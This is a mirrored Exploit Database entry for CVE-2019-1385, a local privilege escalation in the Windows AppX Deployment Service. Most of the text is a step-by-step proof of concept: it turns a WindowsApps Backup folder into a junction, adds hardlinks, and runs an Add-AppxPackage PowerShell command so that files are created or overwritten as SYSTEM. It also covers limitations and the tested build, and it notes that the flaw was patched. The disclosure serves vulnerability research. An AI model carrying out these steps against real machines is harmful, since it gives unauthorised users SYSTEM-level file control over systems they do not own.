Microsoft Windows AppXsvc Deployment Extension – Privilege Escalation

• Exploit Database
• 30 阅读

• 作者： Abdelhamid Naceri
  日期： 2019-11-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47713/

• # Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
  # Date: 2019-11-22
  # Exploit Author: Abdelhamid Naceri
  # Vendor Homepage: www.microsoft.com
  # Tested on: Windows 10 1903
  # CVE : CVE-2019-1385
  
  
  Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability
  
  Class: Local Elevation of Privileges
  
  Description:
  This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability 
  could allow an attacker to overwrite\create file as SYSTEM which can result in EOP .
  The're is 2 way to abuse the issue .
  Step To Reproduce :
  [1] For An Arbitrary File Creation
  1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To
  your target directory example "c:\"
  2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
  3-Check the directory the file should be created now
  4-Enjoy:)
  [2] To Overwrite File 
  1-Create a temp dir in %temp%\
  2-Create a hardlink to your target file in the temp created dir
  3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to
  your temp created dir
  4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
  5-Check the file again
  Limitation :
  when 'MicrosoftEdge.exe' is created it would inherit the directory permission which
  mean the file wouldnt be writtable in majority of cases but a simple example of 
  abusement in the directory "c:\" <- the default acl is preventing Athenticated Users
  from creating file but not modifying them so if we abused the vulnerability in "c:\"
  we will have an arbitrary file created and also writeable from a normal user .
  also you cant overwrite file that are not writable by SYSTEM , i didnt make a check
  in the poc because in if the file is non readable by the current user the check will
  return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite
  file which you cant even read them .
  In the file creation make sure the path is writtable by SYSTEM otherwise the poc will
  fail . I think 99% of folders are writtable by SYSTEM
  Platform:
  This has been tested on a fully patched system (latest patch -> November 2019) :
  OS Edition:Microsoft Windows 10 Home
  Os Version:1903
  OS Version Info: 18362.418
  
  Additional Info
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx= 18362.1.amd64fre.19h1_release.190318-1202
  
  
  Expected result:
  The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED"
  Observed result :
  The Deployment Process is overwritting or creating an arbitrary file as 
  "LOCAL SYSTEM"
  
  NOTE : It was patched on 7/11/19